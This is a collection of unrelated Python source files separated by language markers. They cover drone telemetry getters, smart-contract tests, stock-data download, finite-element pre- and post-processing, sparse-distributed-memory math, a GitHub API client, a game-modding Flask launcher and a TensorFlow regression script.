def getDirection(self):
# Returns a value between 0-360 depending on the direction the ground vehicle is facing
if not self.vehicle:
return -1
return -1
def getLat(self): # Get vehicle latitude
if not self.vehicle:
return -1
return str(self.vehicle.location.global_relative_frame.lat)
def getLon(self): # Get vehicle longitude
if not self.vehicle:
return -1
return str(self.vehicle.location.global_relative_frame.lon)
def getAlt(self): # Get vehicle altitude
if not self.vehicle:
return -1
return self.vehicle.location.global_relative_frame.alt
def get_location(self): # Get vehicle postion (Returns dict of lat,long, and alt)
return {"lat": self.getLat(), "lon": self.getLon(), "alt": self.getAlt()}
pixhawk = Pixhawk()
| python |
import brownie
def test_withdraw_all(splitter, alice, bob):
initial_alice_balance = alice.balance()
initial_contract_balance = splitter.balance()
initial_alice_contract_balance = splitter.balances(alice)["balance"]
initial_bob_balance = bob.balance()
initial_bob_contract_balance = splitter.balances(bob)["balance"]
splitter.withdrawAll({"from": alice})
assert alice.balance() - initial_alice_balance == initial_alice_contract_balance
assert initial_bob_balance == bob.balance()
assert initial_bob_contract_balance == splitter.balances(bob)["balance"]
assert splitter.balances(alice)["balance"] == 0
assert (
splitter.balance() == initial_contract_balance - initial_alice_contract_balance
)
def test_withdraw_all_zero_amount(splitter, alice):
splitter.withdrawAll({"from": alice})
with brownie.reverts():
splitter.withdrawAll({"from": alice})
def test_withdraw_all_not_payee(splitter, david):
with brownie.reverts():
splitter.withdrawAll({"from": david})
| python |
#econogee, 1/28/2016
#Stock Data Retrieval Script
#If executed via the command line, will produce 500 data files with stock price information
#between the dates specified in the main method. Can also be imported to use the RetrieveStock method.
import os
import sys
import numpy as np
import urllib2
def RetrieveStock(TickerSymbol,start,end):
startday,startmonth,startyear = (str(s) for s in start)
endday,endmonth,endyear = (str(s) for s in end)
response = urllib2.urlopen('http://real-chart.finance.yahoo.com/table.csv?s='+str(TickerSymbol)+\
'&a=' + startday + '&b=' + startmonth + '&c=' + startyear + \
'&d=' + endday + '&e=' + endmonth + '&f=' + endyear + \
'&g=d&ignore=.csv')
html = response.read()
html = html.split('\n')
html = np.array(html)
return html
def main():
startday = str(0)
startmonth = str(1)
startyear = str(2005)
endday = str(30)
endmonth = str(1)
endyear = str(2016)
symbols = []
with open('stocklist.csv') as f:
content = f.readlines()
for l in content:
symbols.append(l.split(",")[0])
for s in symbols:
html = RetrieveStock(s,(startday,startmonth,startyear),(endday,endmonth,endyear))
np.savetxt(str(s),html,fmt='%s',delimiter=',')
if __name__ == "__main__": main() | python |
import os
import sys
def pre_process(baseDir, x1, x2, x3):
"""
    A utility function to pre-process the .comm input file by reading it
    and replacing the design variable (Length, Breadth and Thickness) values with
the values provided by BOA
PARAMS:
baseDir - The path of the directory which holds the required input files
x1 - Length
x2 - Thickness
x3 - Breadth
RETURNS:
This function returns the name of export file which is present
in the baseDir which is required for simulation
"""
cnt = 0
# Getting the path of the required input files present in the baseDir
for file in os.listdir(baseDir):
if file.endswith(".comm"):
cnt += 1
comm_file = os.path.join(baseDir, file)
elif file.endswith(".export"):
cnt += 1
export_file = file
elif file.endswith(".mmed"):
cnt += 1
# Checking whether the base directory has all required input files
if cnt < 3:
        raise FileNotFoundError("One or all required input files are missing "
                                "in the directory")
# Opening the .comm file to pre-process the design variables
fhc = open(comm_file, 'r+')
data = fhc.readlines()
# Loops to update all 3 design variables values
# EP - thickness, LONG - Length, LARG - Breadth
for i, v in enumerate(data):
if 'EP' in v:
data[i] = v.split('=')[0] + '= ' + str(x2) + '\n'
break
for i, v in enumerate(data):
if 'LONG' in v:
data[i] = v.split('=')[0] + '= ' + str(x1) + '\n'
break
for i, v in enumerate(data):
if 'LARG' in v:
data[i] = v.split('=')[0] + '= ' + str(x3) + '\n'
break
# Writing the new data to .comm file
fhc.seek(0)
fhc.truncate()
fhc.writelines(data)
fhc.close()
return export_file
def post_process(baseDir):
"""
    A utility function to post-process the .resu result file to get
    the desired displacement value from the file
PARAMS:
baseDir - The path of the directory which holds the output .resu file
RETURNS:
This function returns the displacement value for that epoch
"""
# Getting the path of the output file created in the baseDir post simulation
for file in os.listdir(baseDir):
if file.endswith(".resu"):
resu_file = os.path.join(baseDir, file)
# Opening the .resu file to post-process the result to get the required
# Displacement variable value
fhc = open(resu_file, 'r')
data = fhc.readlines()
fhc.close()
# Post processing the result
y = data[198].split()[-1]
# Delete the result file
os.remove(resu_file)
return float(y)
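# Typical driver flow (a sketch; the case directory and the external Code_Aster run are
# assumptions, not part of this module):
#   export_file = pre_process("/path/to/case_dir", x1=100.0, x2=5.0, x3=20.0)
#   # ... launch the Code_Aster study using the returned .export file ...
#   displacement = post_process("/path/to/case_dir")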
| python |
#! /usr/bin/env python3.8
from larning.setup import (
get_version,
get_github_url,
PACKAGE_NAME,
PACKAGES,
setup,
LONG_DESCRIPTION,
require_interpreter_version,
)
# ˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇ
require_interpreter_version(3, 8, 0)
version = get_version(0, 0, 0)
INSTALL_REQUIRES = []
AUTHOR = "Tasnádi Gábor"
EMAIL = "[email protected]"
URL = get_github_url("tasigabi97")
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
setup(
name=PACKAGE_NAME,
version=version,
author=AUTHOR,
author_email=EMAIL,
description=PACKAGE_NAME,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url=URL,
packages=PACKAGES,
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 3 - Alpha",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
],
install_requires=INSTALL_REQUIRES,
keywords=[
PACKAGE_NAME,
],
license="MIT",
)
| python |
import torch.nn as nn
import torch
import math
class AffinityLayer(nn.Module):
"""
Affinity Layer to compute the affinity matrix from feature space.
M = X * A * Y^T
Parameter: scale of weight d
Input: feature X, Y
Output: affinity matrix M
"""
def __init__(self, dim):
super(AffinityLayer, self).__init__()
self.dim = dim # 1024
self.A = nn.Parameter(torch.Tensor(self.dim, self.dim))
self.reset_parameters()
def reset_parameters(self):
std = 1. / math.sqrt(self.dim)
self.A.data.uniform_(-std, std)
self.A.data += torch.eye(self.dim)
def forward(self, X, Y):
assert X.shape[2] == Y.shape[2] == self.dim
M = torch.matmul(X, (self.A + self.A.transpose(0, 1)) / 2)
M = torch.matmul(M, Y.transpose(1, 2))
return M
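if __name__ == '__main__':
    # Minimal usage sketch; the batch size and keypoint counts are assumptions, not from the original repo.
    layer = AffinityLayer(dim=1024)
    X = torch.randn(2, 5, 1024)  # 5 source keypoint features per sample
    Y = torch.randn(2, 6, 1024)  # 6 target keypoint features per sample
    M = layer(X, Y)              # one affinity score per (source, target) keypoint pair
    assert M.shape == (2, 5, 6)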
| python |
import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def softmax(x):
    x_exp = np.exp(x - np.max(x))  # shift by the max for numerical stability
    return x_exp / np.sum(x_exp)
def relu(x):
return np.maximum(x, np.zeros_like(x))
| python |
"""
Author: Trenton Bricken @trentbrick
All functions in this script are used to generate and approximate the circle intersection
in binary and continuous space and also convert between cosine similarity and hamming distance.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import binom, norm
from scipy.sparse import csc_matrix, coo_matrix, csr_matrix
import pandas as pd
import scipy
from scipy.integrate import quad
import time
from scipy.special import comb
import torch
import torch.optim as optim
import torch.nn.functional as F
def softmax(x, beta):
assert len(x.shape) <3, 'this softmax can currently only handle vectors'
x = x * beta
return np.exp(x)/np.exp(x).sum()
def check_cosine_and_hamm_bounds(cosines, hamms, n):
"""
Ensuring conversion between cosine and hamming distance don't have
any numerical errors.
"""
if not torch.is_tensor(cosines):
cosines, hamms = np.asarray(cosines), np.asarray(hamms)
assert (hamms<0).sum() == 0 and (hamms > n).sum() == 0, "Hamm is out of bounds!"
assert (cosines>1).sum() == 0 and (cosines<-1).sum() == 0, "Cosine is out of bounds!"
def cosine_to_hamm(cosines, n):
if torch.is_tensor(cosines):
# some cosines are numerically unstable in being larger than 1.0 by a small epsilon...
# going to fix these.
numerical_error_inds = torch.logical_and(cosines>1, cosines < 1+ 1e-4)
cosines[numerical_error_inds] -=1e-4
hamms = n*(1-cosines)/2
hamms = torch.floor(hamms) if torch.is_tensor(cosines) else np.floor(hamms)
check_cosine_and_hamm_bounds(cosines, hamms, n)
return hamms
def hamm_to_cosine(hamms, n):
cosines = 1-(hamms*2/n)
check_cosine_and_hamm_bounds(cosines, hamms, n)
return cosines
def torch_hamm_dist(A, B):
"""
Assuming that A and B have patterns as vectors when input.
The columns of what is returned will be A compared with everything in B.
Therefore the order of what comes first is important!
"""
assert len(A.shape) == len(B.shape), "Need for A and B to be the same shape."
return torch.cdist(A.T.type(torch.float), B.T.type(torch.float), p=0).type(torch.int).T
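# Sanity-check sketch of the column-as-pattern convention (toy shapes, an assumption):
#   A = torch.randint(0, 2, (64, 3))      # three 64-bit patterns stored as columns
#   torch_hamm_dist(A, A).diag()          # -> all zeros: a pattern is 0 bits from itself
#   torch_hamm_dist(A, 1 - A).diag()      # -> all 64: a pattern is n bits from its complement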
### FUNCTIONS APPROXIMATING A KNOWN AND PROVIDED CIRCLE INTERSECTION:
def get_binary_and_continuous_caches(n, hamm_radius, r, cont_cache_resolution):
"""
Getting both the binary and continuous circle intersection results and caching them
to make the SDM experiments run much more efficiently.
"""
all_dvs = np.arange(0,n+1)
cached_intersects = expected_intersection_lune(n, all_dvs, hamm_radius, r)
cs_intervals = np.linspace(-1,1,cont_cache_resolution).astype(float)
cs_intervals[-1] = cs_intervals[-1] - 1e-15
log_continuous_cached_intersects = cap_intersection(n, cs_intervals, hamm_radius, r,
return_log=True,
ham_input=False, print_oobs=False)
return cached_intersects, log_continuous_cached_intersects
def fit_beta_regression(n, xvals, res, return_bias=False, ham_input=True):
""" Log linear regression to fit a beta coefficent to whatever is input."""
xvals = np.asarray(xvals)
res = np.asarray(res)
if ham_input:
xvals = hamm_to_cosine(xvals, n)
zeros_in_res = False
# need to remove any zeros for this calculation.
if res[-1] == 0.0:
print("res equals 0, problem for the log. Removing from the equation here.")
mask = res!=0.0
num_zeros = (res==0.0).sum()
res = res[mask]
xvals = xvals[mask]
zeros_in_res = True
yvals = np.log(np.asarray(res))
# log linear regression closed form solution.
beta = np.cov(xvals, yvals)[0][1] / np.var(xvals)
bias = np.mean(yvals) - beta*np.mean(xvals)
#mse between res and beta res:
#print('Beta Fit MSE:',np.sum((res-np.exp(beta*xvals)+bias)**2)/len(res) )
if return_bias:
return beta, bias
else:
return beta
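# Sketch of what the regression recovers (synthetic data, an assumption for illustration):
#   dvals = np.arange(0, 65)                        # Hamming distances for n = 64
#   res = np.exp(3.0 * hamm_to_cosine(dvals, 64))   # exactly exponential in cosine space
#   fit_beta_regression(64, dvals, res)             # -> approximately 3.0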
def fit_softmax_backprop(n, dvals, targets, lr=0.3, niters=5000, ham_input=False, plot_losses=True):
"""
    Learns a normalized approximation to the circle intersection, i.e. fits a softmax function. This is unrealistic in
    that it overfits to the softmax rather than to the exponential approximation, where the softmax is conditioned on the number of inputs in the normalizing constant. It is still
    interesting to analyze for what a perfect Beta fit to a particular softmax would be.
"""
#
targets = torch.Tensor(targets/sum(targets))
if ham_input:
xvals = torch.Tensor( hamm_to_cosine(dvals, n) )
else:
xvals = torch.Tensor(dvals)
beta = torch.nn.Parameter(torch.Tensor(np.random.uniform(1,30, 1)), requires_grad=True)
optimizer = optim.Adam([beta], lr=lr)
losses = []
for i in range(niters):
# training loop:
optimizer.zero_grad() # zero the gradient buffers
preds = F.softmax(beta*xvals)
loss = ((targets-preds)**2).sum() / len(dvals)
loss.backward()
optimizer.step()
losses.append(loss.item())
if plot_losses:
plt.figure()
plt.plot(losses)
plt.title("Losses during learning")
plt.show()
print("final loss", loss.item())
return beta.item()
def integral_func(phi, th1, n):
""" Used in computing the continuous hypersphere cap intersection below. """
return np.sin(phi)**(n-2) * scipy.special.betainc( (n-2)/2 , 1/2, 1-( (np.tan(th1))/(np.tan(phi)) )**2 )
def log_J_n(th1, th2, r, n):
""" Used in computing the continuous hypersphere cap intersection below. """
integral = quad(integral_func, th1, th2, args=(th1, n) )[0]
#print(np.log(np.pi**( (n-1) /2) ) , scipy.special.loggamma( (n-1) /2), np.log(r**(n-1)), np.log(integral ))
return np.log(np.pi**( (n-1) /2) ) - scipy.special.loggamma( (n-1) /2) + np.log(r**(n-1)) + np.log(integral )
def cap_intersection(n, cs_dvs, hamm_radius, r, rad=1,
return_log=False, ham_input = False, print_oobs=False):
"""
Computes the continuous hypersphere cap intersection.
Does all compute in log space for numerical stability, option to return
log results or not.
"""
#size of total space
log_total_space = log_hypersphere_sa(n,rad)
if r is not None:
if type(r) != int:
r = np.round(r) # number of neurons
r = float(r)
log_perc_addresses_w_neurons = np.log(r) - log_total_space
else:
log_perc_addresses_w_neurons = np.log(1e40) # a very large number of neurons
if ham_input:
        cs_dvs = hamm_to_cosine(cs_dvs, n)
c_dist = hamm_to_cosine(hamm_radius,n)
t1 = t2 = np.arccos(c_dist)
log_inters = []
for cs_dv in cs_dvs:
tv = np.arccos(cs_dv)
if tv>=t1+t2 or t1+t2>(2*np.pi)-tv:
if print_oobs:
print("out of equation bounds", cs_dv)
log_inters.append(np.nan)
continue
tmin = np.arctan( (np.cos(t1)/(np.cos(t2)*np.sin(tv))) - (1/np.tan(tv)) )
assert np.round(tmin,5) == np.round(tv-tmin,5)
assert np.round(t2,5)==np.round(t1,5)
log_inters.append(2+log_J_n(tmin, t2, rad, n) )
log_inters = np.asarray(log_inters)
log_num_expected_neurons = log_inters + log_perc_addresses_w_neurons
if return_log:
# have not removed the nans either
log_num_expected_neurons = np.nan_to_num(log_num_expected_neurons, nan=-1e+30)
return log_num_expected_neurons
else:
num_expected_neurons = np.exp(log_num_expected_neurons)
num_expected_neurons = np.nan_to_num(num_expected_neurons, nan=0.0)
return num_expected_neurons
def log_hypersphere_sa(n, rad=1):
# n dim hypersphere surface area.
# https://en.wikipedia.org/wiki/Unit_sphere
# assuming L2 norm with r=1!
return np.log(2* (np.pi**(n/2) ) ) - scipy.special.loggamma(n/2) + np.log(rad**(n-1))
def hypersphere_v(n, r):
"""
Volume of a hypersphere. Not used but implemented.
"""
    return (np.pi**(n/2) )/(scipy.special.gamma((n/2)+1) )*(r**n)  # V_n = pi^(n/2) / Gamma(n/2 + 1) * r^n
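# Quick worked check of the two formulas for n = 3 (the ordinary sphere):
#   np.exp(log_hypersphere_sa(3))   # -> 4*pi   ~ 12.566, surface area of the unit 2-sphere
#   hypersphere_v(3, 1)             # -> 4*pi/3 ~  4.189, volume of the unit ball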
def expected_intersection_lune(n, dvals, hamm_radius, r):
# This equation gives the same results as the one we derive and present in the paper. It was introduced in the SDM book and runs a bit faster.
"""
Computes the fraction of the space that exists in the circle intersection using the Lune equation.
args::
n = space dimension
dvals = Hamm dist between circle centers
hamm_radius = hamming distance radius each circle uses
r = number of neurons
hard_mem_places = turns the fraction of the space in the
expected number of neurons
that exist in this fraction.
------------
returns::
res = list of floats for fraction of the space
"""
#ensure all are ints:
n = int(n)
hamm_radius = int(hamm_radius)
if r is not None:
r = int(r)
perc_addresses_w_neurons = r/(2**n)
else:
perc_addresses_w_neurons = 1.0
res = []
area = 0
# compute size of circle
for i in range(hamm_radius+1):
area += comb(n,i)
for d in dvals:
# compute lune
d = int(d)
lune = 0
for i in range(d):
j = i+1
if j%2==0:
continue
lune+= comb(j-1, (j-1)/2)*comb(n-j, hamm_radius-((j-1)/2))
intersect = area - lune
#print(d, intersect, area, lune, perc_addresses_w_neurons)
expected_intersect = np.log(intersect)+np.log(perc_addresses_w_neurons)
res.append(np.exp(expected_intersect))
res = np.asarray(res)
res = np.nan_to_num(res, nan=0.0)
return res
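# Usage sketch (parameter values are assumptions for illustration):
#   expected_intersection_lune(64, [0, 10, 20, 40], 20, 1_000_000)
# returns the expected number of neurons shared by two circles of Hamming radius 20 whose
# centers are 0, 10, 20 and 40 bits apart; the values decrease monotonically in d, and at
# d = 0 the "intersection" is just the circle itself.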
def expected_intersection_interpretable(n, dvals, hamm_radius, r, weight_type=None):
if r is None:
r = 1.0
perc_addresses_w_neurons = np.log(float(r)) - np.log(2.0**n)
res = []
for dval in dvals:
possible_addresses = 0
for a in np.arange(n-hamm_radius-(dval//2),n+0.1-dval):
# solve just for b then c is determined.
bvals = np.arange(np.maximum(0,n-hamm_radius-a), dval-(n-hamm_radius-a)+0.1) # +0.1 to ensure that the value here is represented.
#print(a, 'b values', bvals)
if len(bvals)==0:
continue
if weight_type == "Linear":
# linear weighting from the read and write operations.
weighting = ((a+bvals)/n) * ( (a+(dval-bvals))/n )
if weight_type == "Expo":
# linear weighting from the read and write operations.
weighting = np.exp(-0.01*(n-(a+bvals))) * np.exp(-0.01*(n-(a+(dval-bvals))))
elif not weight_type:
weighting = 1
possible_addresses += comb(n-dval,a)*(weighting*comb(dval,bvals)).sum()
expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
res.append(np.exp(expected_intersect))
return np.asarray(res)
def space_frac_to_hamm_radius(n, space_frac_rang):
""" Computes the Hamming distance that should be used for a circle
to have an area that includes a given fraction of a given n
dimensional space.
args::
- n = space dimension
- space_frac_rang = list of space fractions to use
returns::
-list of hamming distances to use
"""
    hamm_radii = []
    for space_frac in space_frac_rang:
        hamm_radii.append( int(binom.ppf(space_frac, n, 0.5)) )
    return hamm_radii
def hamm_radius_to_space_frac(n, hamm_radius_rang):
""" Computes the space fraction $p$ that corresponds to a given Hamming distance input
args::
- n = space dimension
- space_frac_rang = list of Hamming distances used
returns::
- list of p fractions
"""
pfracs = []
for hd in hamm_radius_rang:
pfracs.append( binom.cdf(hd, n, 0.5) )
return pfracs
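# The two helpers above are approximate inverses through the Binomial(n, 0.5) CDF/PPF, e.g.:
#   hd = space_frac_to_hamm_radius(1000, [0.001])[0]   # radius covering ~0.1% of {0,1}^1000
#   hamm_radius_to_space_frac(1000, [hd])[0]           # -> roughly 0.001 again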
def plot_line(x, y, label_prefix, label_val, norm=True):
label = label_prefix
if label_val:
label +=str(label_val)
if norm:
y = y/sum(y)
plt.plot(x, y, label=label)
def label_plot(title, norm=True, directory="figures/Jaeckel_Analysis/", save_name=None):
plt.legend()
plt.title(title)
plt.xlabel('Hamming Distance Between Pattern and Query')
if norm:
plt.ylabel('Normalized overlap weights')
else:
plt.ylabel('Expected neurons in intersection')
if save_name:
plt.gcf().savefig(directory+save_name+'.png', dpi=250)
plt.show()
def SDM_Interpretable(params, dvals, thresholds, title=None, label_prefix='ham='):
"""Same as the SDM lune equation in results. Equation was inspired by Jaeckel's SDM Hyperplane but applied to the SDM setting with binary vectors and optimized by working out lower and upper bounds to avoid using a CSP. This equation is much more interpretable than the Lune one used in the SDM Appendix B.
See paper for the constraints and bounds explained."""
perc_addresses_w_neurons = np.log(params.r) - np.log(2.0**params.n)
for thresh in thresholds:
res = []
for dval in dvals:
possible_addresses = 0
#print('range of a vals', np.arange(params.n-thresh-(dval//2),params.n+1-dval))
for a in np.arange(params.n-thresh-(dval//2),params.n+0.1-dval):
# solve just for b then c is determined.
bvals = np.arange(np.maximum(0,params.n-thresh-a), dval-(params.n-thresh-a)+0.1) # +0.1 to ensure that the value here is represented.
#print(a, 'b values', bvals)
if len(bvals)==0:
continue
possible_addresses += comb(params.n-dval,a)*comb(dval,bvals).sum()
expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
            res.append(np.exp(expected_intersect))
res =np.asarray(res)
plot_line(dvals, res, label_prefix, thresh, params.norm)
if params.fit_beta_and_plot_attention:
            beta, bias = fit_beta_regression(params.n, dvals, res, return_bias=True)
            fit_beta_res = np.exp(beta * hamm_to_cosine(np.asarray(dvals), params.n) + bias)
            plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, thresh, params.norm)
if title: # else can call "label plot separately"
label_plot(title, params.norm)
return res
def SDM_lune(params, dvals, title=None, label_prefix='ham='):
"""Exact calculation for SDM circle intersection. For some reason mine is a slight upper bound on the results found in the book. Uses a proof from Appendix B of the SDM book (Kanerva, 1988). Difference is neglible when norm=True."""
res = expected_intersection_lune(params.n, dvals, params.hamm_radius, params.r )
if params.plot_lines:
plot_line(dvals, res, label_prefix, params.hamm_radius, params.norm)
if params.fit_beta_and_plot_attention:
        beta, bias = fit_beta_regression(params.n, dvals, res, return_bias=True)
        fit_beta_res = np.exp(beta * hamm_to_cosine(np.asarray(dvals), params.n) + bias)
        plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, params.hamm_radius, params.norm)
if title: # else can call "label plot separately"
label_plot(title, params.norm)
return res
def f(x, c_p):
"""This is used in the continuous approximation to the circle intersection derived in Appendix B of the SDM book that needs to be numerically integrated. It is less accurate than the exact equation we outline in the paper and use for our circle intersection computations in all figures and analyses unless otherwise noted."""
return 1/(2*np.pi*np.sqrt(x*(1-x)))*np.exp(-0.5*(c_p**2/(1-x)))
def expected_intersection_continuous(n, dvals, hamm_radius, r, hard_mem_places):
"""
Uses binary vector space with a continuous approximation from the SDM book that is inaccurate!
Computes the fraction of the space that exists in the circle intersection using the continuous approximation to the Lune equation.
args::
n = space dimension
dvals = Hamm dist between circle centers
hamm_radius = hamming distance radius each circle uses
r = number of neurons
hard_mem_places = turns the fraction of the space in the
expected number of neurons
that exist in this fraction.
------------
returns::
res = list of floats for fractions of the space or number of neurons present in this fraction depending if hard_mem_places is on.
"""
res = []
for dv in dvals:
c_p = (hamm_radius-(n/2))/np.sqrt(n/4)
intersect = quad(f, dv/n,1, args=(c_p))
num = intersect[0]
if hard_mem_places:
num*=r
res.append(num)
return res | python |
import json
import sys
from concurrent.futures import ThreadPoolExecutor, Future
from urllib3.connectionpool import HTTPSConnectionPool, HTTPResponse
from urllib3.exceptions import NewConnectionError, MaxRetryError, HTTPError
from typing import Dict, List, Any
from string import Template
class NetMod:
_instance = None
__pool: HTTPSConnectionPool
__pool_size: int = 5
__api_base: str = 'api.github.com'
__port: int = 443
__timeout: float = 5.0
__repo_route: Template = Template('/repos/$repo')
__user_route: Template = Template('/users/$user')
__org_route: Template = Template('/users/$user/orgs')
"""
explicitly request v3 of the API
https://docs.github.com/en/rest/overview/resources-in-the-rest-api#current-version
"""
__headers: Dict[str, str] = {
'Accept': 'application/vnd.github.v3+json',
'User-Agent': 'Python-urllib/3',
'Authorization': ''
}
"""
referenced from
https://python-patterns.guide/gang-of-four/singleton/
"""
def __new__(cls, *args, **kwargs):
if cls._instance is None:
cls._instance = super(NetMod, cls).__new__(cls)
return cls._instance
def __init__(self):
self.__pool = HTTPSConnectionPool(host=NetMod.__api_base, maxsize=NetMod.__pool_size, headers=NetMod.__headers,
timeout=NetMod.__timeout, port=NetMod.__port, block=True)
def __make_request(self, api_route: str, method: str = 'get') -> Dict[str, Any]:
try:
response: HTTPResponse = self.__pool.request(method, api_route, release_conn=True, redirect=True)
res_data = json.loads(response.data)
if response.status != 200:
raise HTTPError(response.status, res_data['message'])
return res_data
except (NewConnectionError, MaxRetryError):
sys.exit("""Failed to connect. Exiting...""")
except HTTPError as err:
sys.exit(err)
def fetch_repos_data(self, repos: List[str]) -> Dict[str, Any]:
api_routes = [self.__repo_route.substitute(repo=repo) for repo in repos]
return self.__fetch_all__concurrent(repos, api_routes)
def fetch_users_data(self, users: List[str]) -> Dict[str, Any]:
api_routes = [self.__user_route.substitute(user=user) for user in users]
return self.__fetch_all__concurrent(users, api_routes)
def fetch_org_data(self, user: str) -> Dict[str, Any]:
api_route = self.__org_route.substitute(user=user)
return self.__make_request(api_route)
def __fetch_all__concurrent(self, entries: List[str], api_routes: List[str]) -> Dict[str, Any]:
max_workers = max(len(entries), self.__pool_size)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
res: Dict[str, Future[Dict[str, Any]]] = {entry: executor.submit(self.__make_request, route) for
entry, route in
zip(entries, api_routes)}
return {user: data.result() for user, data in res.items()}
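# Intended usage sketch (the GitHub handles are assumptions; network access is required):
#   net = NetMod()
#   net.fetch_users_data(['octocat'])                  # -> {'octocat': {...user JSON...}}
#   net.fetch_repos_data(['octocat/Hello-World'])      # -> {'octocat/Hello-World': {...repo JSON...}}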
| python |
import argparse
import logging
import sys
from pathlib import Path
import requests
from flask import Flask
from packaging import version
from .views.assets import blueprint as assets_blueprint
from .views.index import blueprint as index_blueprint
PROCESS_NAME = "Spel2.exe"
# Setup static files to work with onefile exe
BASE_DIR = Path(__file__).resolve().parent
APP_DIR = BASE_DIR
ROOT_DIR = BASE_DIR.parent.parent
if hasattr(sys, "_MEIPASS"):
BASE_DIR = BASE_DIR / getattr(sys, "_MEIPASS")
APP_DIR = Path(sys.executable).resolve().parent
ROOT_DIR = BASE_DIR
app = Flask(
__name__,
static_folder=f"{BASE_DIR / 'static'}",
template_folder=f"{BASE_DIR / 'templates'}",
)
app.register_blueprint(index_blueprint)
app.register_blueprint(assets_blueprint, url_prefix="/assets")
def get_latest_version():
try:
return version.parse(
requests.get(
"https://api.github.com/repos/spelunky-fyi/modlunky2/releases/latest"
).json()["tag_name"]
)
except Exception: # pylint: disable=broad-except
return None
def get_current_version():
with (ROOT_DIR / "VERSION").open() as version_file:
return version.parse(version_file.read().strip())
def main():
parser = argparse.ArgumentParser(description="Tool for modding Spelunky 2.")
parser.add_argument(
"--host", type=str, default="127.0.0.1", help="The host to listen on."
)
parser.add_argument("--port", type=int, default=8040, help="Port to listen on.")
parser.add_argument("--debug", default=False, action="store_true")
parser.add_argument(
"--process-name",
default=PROCESS_NAME,
help="Name of Spelunky Process. (Default: %(default)s",
)
parser.add_argument(
"--install-dir",
default=APP_DIR,
help="Path to Spelunky 2 installation. (Default: %(default)s",
)
args = parser.parse_args()
log_format = "%(asctime)s: %(message)s"
logging.basicConfig(format=log_format, level=logging.INFO, datefmt="%H:%M:%S")
try:
app.config.SPELUNKY_INSTALL_DIR = Path(args.install_dir)
app.config.MODLUNKY_CURRENT_VERSION = get_current_version()
app.config.MODLUNKY_LATEST_VERSION = get_latest_version()
app.config.MODLUNKY_NEEDS_UPDATE = (
app.config.MODLUNKY_CURRENT_VERSION < app.config.MODLUNKY_LATEST_VERSION
)
app.run(host=args.host, port=args.port, debug=args.debug)
except Exception as err: # pylint: disable=broad-except
input(f"Failed to start ({err}). Press enter to exit... :(")
| python |
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense
import numpy as np
import os
# We set seeds for reproducibility
tf.random.set_seed(1)
np.random.seed(1)
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/autos/imports-85.data'
# download the data from given URL and with given columns
columns = ['symbolying','normalized-losses', 'make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', 'drive-wheels', 'engine-location'
,'wheel-base', 'length', 'width', 'height', 'curb-weight', 'engine-type', 'num-of-cylinders', 'engine-size', 'fuel-system'
,'bore', 'stroke', 'compression-ratio', 'horsepower', 'peak-rpm', 'city-mpg', 'highway-mpg', 'price']
#loading the dataset using pandas and replacing "?" with NA values
raw_data = pd.read_csv(url,names=columns,na_values="?")
# We ignore the 'symbolying' column (it is not used below)
raw_data.pop('symbolying')
#drop all rows with missing values
dataset = raw_data.dropna().copy()
# we perform min-max normalization as the following
norm_data = dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]].copy()
norm_data_mins = norm_data.min()
norm_data_maxs = norm_data.max()
normalized_features =(norm_data-norm_data_mins)/(norm_data_maxs - norm_data_mins)
dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]] = normalized_features.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]]
dataset = pd.get_dummies(dataset,columns=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
,"engine-location","engine-type","fuel-system"],
prefix=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
,"engine-location","engine-type","fuel-system"],prefix_sep='_')
# We set 80% of the available data for training and the rest for testing
train_dataset = dataset.sample(frac = 0.8, random_state=1)
test_dataset = dataset.drop(train_dataset.index)
train_features = train_dataset.copy()
test_features = test_dataset.copy()
train_labels = train_features.pop('normalized-losses')
test_labels = test_features.pop('normalized-losses')
# Working with such a small dataset, it is better to train the model sample by sample so that it converges quickly
batch_size = 1
train_ds = tf.data.Dataset.from_tensor_slices((np.array(train_features),np.log(np.array(train_labels)))).batch(batch_size)
test_ds = tf.data.Dataset.from_tensor_slices((np.array(test_features),np.log(np.array(test_labels)))).batch(batch_size)
class Regression_Model(Model):
def __init__(self):
super(Regression_Model,self).__init__()
self.dense1 = Dense(64, activation='relu' )
self.dense2 = Dense(32, activation='relu' )
self.dense3 = Dense(16, activation='relu' )
self.final = Dense(1)
def call(self,x):
x = self.dense1(x)
x = self.dense2(x)
x = self.dense3(x)
return self.final(x)
class Trainer:
def __init__(self):
self.model:Regression_Model = Regression_Model()
self.loss = self.get_loss()
self.optimizer = self.get_optimizer("SGD")
self.train_loss = tf.keras.metrics.Mean(name='train_loss')
